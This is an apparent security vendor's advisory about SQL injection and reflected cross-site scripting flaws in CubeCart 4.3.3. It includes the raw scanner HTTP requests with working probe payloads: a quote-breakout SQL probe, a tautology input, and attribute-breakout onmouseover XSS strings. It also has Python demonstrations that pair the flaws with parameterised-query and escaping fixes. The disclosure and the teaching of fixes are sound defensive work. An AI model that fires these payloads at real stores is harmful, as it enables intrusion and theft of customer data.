SQL Injection and XSS vulnerabilities in CubeCart version 4.3.3

Note: This article refers to an older version of Acunetix. Click here to download the latest version.

We are continuing our series on the security vulnerabilities found in a number of web applications while testing the latest version of Acunetix WVS v7. In this blog post we look at the details of the security problems Acunetix WVS discovered in CubeCart.

CubeCart is a fully featured ecommerce shopping cart solution used by over a million store owners around the world.

The following web vulnerabilities were found in CubeCart version 4.3.3:

  1. SQL injection in “/cubecart_4/index.php”, parameter “searchStr”.
  2. Cross-site Scripting vulnerability in “/cubecart_4/modules/gateway/WorldPay/return.php”, parameter “amount”.
  3. Cross-site Scripting vulnerability in “/cubecart_4/modules/gateway/WorldPay/return.php”, parameter “cartId”.
  4. Cross-site Scripting vulnerability in “/cubecart_4/modules/gateway/WorldPay/return.php”, parameter “email”.
  5. Cross-site Scripting vulnerability in “/cubecart_4/modules/gateway/WorldPay/return.php”, parameter “transId”.
  6. Cross-site Scripting vulnerability in “/cubecart_4/modules/gateway/WorldPay/return.php”, parameter “transStatus”.

Technical details about each web vulnerability are below:

1. SQL injection in “/cubecart_4/index.php”, parameter “searchStr”.

Additional details:

Sending a single quote in the searchStr parameter produced a database error message that discloses the affected query, with the injected quote breaking the string literal:

SQL:
SELECT id FROM cube_CubeCart_search WHERE searchstr='''

Sample HTTP Request:

GET /cubecart_4/index.php?_a=viewCat&searchStr='&Submit=Go HTTP/1.1
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect: enabled
Cookie: PHPSESSID=7c970bfe00c50261d25166dbab43c294; ccUser=7c970bfe00c50261d25166dbab43c294
Host: webapps7:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)

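The error message above shows the classic pattern behind this finding: the raw searchStr value is spliced into the SQL text, so a single quote closes the string literal early and the rest of the input becomes part of the statement. The following is an added example, not CubeCart's code, that reproduces the pattern against a constructed in-memory SQLite table named after the one in the error message (the column layout and sample rows are assumptions) and places the parameterised fix beside it.

```python
import sqlite3

# Constructed stand-in for the table named in CubeCart's error message.
# Schema and rows are assumptions for this example, not CubeCart's real data.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE cube_CubeCart_search (id INTEGER PRIMARY KEY, searchstr TEXT)"
    )
    conn.executemany(
        "INSERT INTO cube_CubeCart_search (searchstr) VALUES (?)",
        [("shoes",), ("laptop",), ("o'neill",)],
    )
    conn.commit()
    return conn


def search_vulnerable(conn, search_str):
    # Same construction the error message reveals: the parameter is pasted
    # into the SQL string, so a quote in the input changes the statement.
    sql = "SELECT id FROM cube_CubeCart_search WHERE searchstr='%s'" % search_str
    return [row[0] for row in conn.execute(sql)]


def search_fixed(conn, search_str):
    # Parameterised query: the value travels separately from the SQL text,
    # so quotes in the input are data and can never alter the statement.
    sql = "SELECT id FROM cube_CubeCart_search WHERE searchstr=?"
    return [row[0] for row in conn.execute(sql, (search_str,))]


def probe(fn, search_str):
    """Run one lookup on a fresh database.

    Returns ("ok", matching_ids) or ("error", message) so the two
    implementations can be compared on the same inputs.
    """
    conn = make_db()
    try:
        return ("ok", fn(conn, search_str))
    except sqlite3.OperationalError as exc:
        return ("error", str(exc))
    finally:
        conn.close()


if __name__ == "__main__":
    # The scanner's probe: a lone quote. The vulnerable query dies with a
    # syntax error (WHERE searchstr='''), the fixed one simply finds nothing.
    print(probe(search_vulnerable, "'"))
    print(probe(search_fixed, "'"))
    # A legitimate value containing an apostrophe only works when parameterised.
    print(probe(search_vulnerable, "o'neill"))
    print(probe(search_fixed, "o'neill"))
    # A tautology shows why a syntax error is not the end of the story.
    print(probe(search_vulnerable, "' OR '1'='1"))
```

The syntax error is what the scanner keys on, but the last probe is the point for a defender: once the quote escapes the literal, the attacker controls the rest of the WHERE clause, and no amount of error suppression changes that. Only the parameterised form removes the problem.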

2. Cross-site Scripting vulnerability in “/cubecart_4/modules/gateway/WorldPay/return.php”, parameter “amount”.

Attack details

URL encoded GET input amount was set to " onmouseover=prompt(949088) bad="
The input is reflected inside a tag element between double quotes.

Sample HTTP Request:

GET /cubecart_4/modules/gateway/WorldPay/return.php?amount=%22%20onmouseover%3dprompt%28949088%29%20bad%3d%22&cartId=&email=&transId=&transStatus= HTTP/1.1
Cookie: PHPSESSID=7c970bfe00c50261d25166dbab43c294; ccUser=7c970bfe00c50261d25166dbab43c294
Host: webapps7:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)

3. Cross-site Scripting vulnerability in “/cubecart_4/modules/gateway/WorldPay/return.php”, parameter “cartId”.

Attack details

URL encoded GET input cartId was set to " onmouseover=prompt(934178) bad="
The input is reflected inside a tag element between double quotes.

Sample HTTP Request:

GET /cubecart_4/modules/gateway/WorldPay/return.php?amount=&cartId=%22%20onmouseover%3dprompt%28934178%29%20bad%3d%22&email=&transId=&transStatus= HTTP/1.1
Cookie: PHPSESSID=7c970bfe00c50261d25166dbab43c294; ccUser=7c970bfe00c50261d25166dbab43c294
Host: webapps7:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)

4. Cross-site Scripting vulnerability in “/cubecart_4/modules/gateway/WorldPay/return.php”, parameter “email”.

Attack details

URL encoded GET input email was set to " onmouseover=prompt(908306) bad="
The input is reflected inside a tag element between double quotes.

Sample HTTP Request:

GET /cubecart_4/modules/gateway/WorldPay/return.php?amount=&cartId=&email=%22%20onmouseover%3dprompt%28908306%29%20bad%3d%22&transId=&transStatus= HTTP/1.1
Cookie: PHPSESSID=7c970bfe00c50261d25166dbab43c294; ccUser=7c970bfe00c50261d25166dbab43c294
Host: webapps7:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)

5. Cross-site Scripting vulnerability in “/cubecart_4/modules/gateway/WorldPay/return.php”, parameter “transId”.

Attack details

URL encoded GET input transId was set to " onmouseover=prompt(998313) bad="
The input is reflected inside a tag element between double quotes.

Sample HTTP Request:

GET /cubecart_4/modules/gateway/WorldPay/return.php?amount=&cartId=&email=&transId=%22%20onmouseover%3dprompt%28998313%29%20bad%3d%22&transStatus= HTTP/1.1
Cookie: PHPSESSID=7c970bfe00c50261d25166dbab43c294; ccUser=7c970bfe00c50261d25166dbab43c294
Host: webapps7:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)

6. Cross-site Scripting vulnerability in “/cubecart_4/modules/gateway/WorldPay/return.php”, parameter “transStatus”.

Attack details

URL encoded GET input transStatus was set to " onmouseover=prompt(923101) bad="
The input is reflected inside a tag element between double quotes.

Sample HTTP Request:

GET /cubecart_4/modules/gateway/WorldPay/return.php?amount=&cartId=&email=&transId=&transStatus=%22%20onmouseover%3dprompt%28923101%29%20bad%3d%22 HTTP/1.1
Cookie: PHPSESSID=7c970bfe00c50261d25166dbab43c294; ccUser=7c970bfe00c50261d25166dbab43c294
Host: webapps7:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
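All five WorldPay callback findings share one root cause: a query parameter is echoed into an HTML attribute value between double quotes without entity encoding, so a payload beginning with a quote closes the attribute and the rest of it (onmouseover=...) becomes a new event-handler attribute. The following is an added example, not CubeCart's or WorldPay's code, that renders the five parameters into hidden form fields the way the finding describes, then re-renders them with attribute-context escaping, and uses Python's HTML parser to check whether the payload actually became a handler attribute. The hidden-field markup and the parameter dictionary are assumptions for the demonstration.

```python
import html
from html.parser import HTMLParser

# Parameter names from the return.php findings; the payload shape mirrors the
# scanner's probes (constructed here, with one of its random markers).
PARAMS = ("amount", "cartId", "email", "transId", "transStatus")
PAYLOAD = '" onmouseover=prompt(949088) bad="'


def callback_params(target, payload=PAYLOAD):
    """Build a request like the scanner's: the payload in one parameter, the rest empty."""
    return {name: (payload if name == target else "") for name in PARAMS}


def render_vulnerable(params):
    """Echo each value into a double-quoted attribute with no escaping.

    This reproduces the reflection pattern the finding describes; the hidden
    form field is an assumed template, not CubeCart's actual markup.
    """
    return "\n".join(
        '<input type="hidden" name="%s" value="%s">' % (name, value)
        for name, value in params.items()
    )


def render_fixed(params):
    """Same template, but every value is entity-encoded for an attribute context.

    quote=True turns the double quote into &quot;, so the value can never
    terminate the attribute it sits in.
    """
    return "\n".join(
        '<input type="hidden" name="%s" value="%s">'
        % (name, html.escape(value, quote=True))
        for name, value in params.items()
    )


class HandlerFinder(HTMLParser):
    """Collect every on* attribute the browser-like parser sees on any tag."""

    def __init__(self):
        super().__init__()
        self.handlers = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name.startswith("on"):
                self.handlers.append((tag, name, value))


def injected_handlers(markup):
    """Return [(tag, attr, value), ...] for event handlers present in the markup."""
    finder = HandlerFinder()
    finder.feed(markup)
    finder.close()
    return finder.handlers


if __name__ == "__main__":
    for target in PARAMS:
        params = callback_params(target)
        print(target, "vulnerable:", injected_handlers(render_vulnerable(params)))
        print(target, "fixed:     ", injected_handlers(render_fixed(params)))
```

Parsing the output rather than grepping for the payload string is deliberate: after escaping, the literal text onmouseover=prompt(949088) is still present in the page, but only as attribute content, and a parser confirms it never becomes an attribute of its own. That is the check to reproduce against a real response when verifying the fix.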

These vulnerabilities were reported to the CubeCart team on 22/7/2010 via the support system on their website, and they have been fixed in the latest version of CubeCart. If you are using CubeCart, download the latest version from their website.

  • Guys, this version is way out of date! This article concerns 4.3.3 but the current release is 4.4.2!!

    Can you test it on that and let us know if you come across any vulnerabilities?

    • Hi Al,

      I’m Bogdan Calin from Acunetix. The issues reported in this article are the same issues I’ve reported to you on 22 Jul 2010 10:47 AM in your knowledge base.
      These issues were fixed in the latest version. I’ve checked.
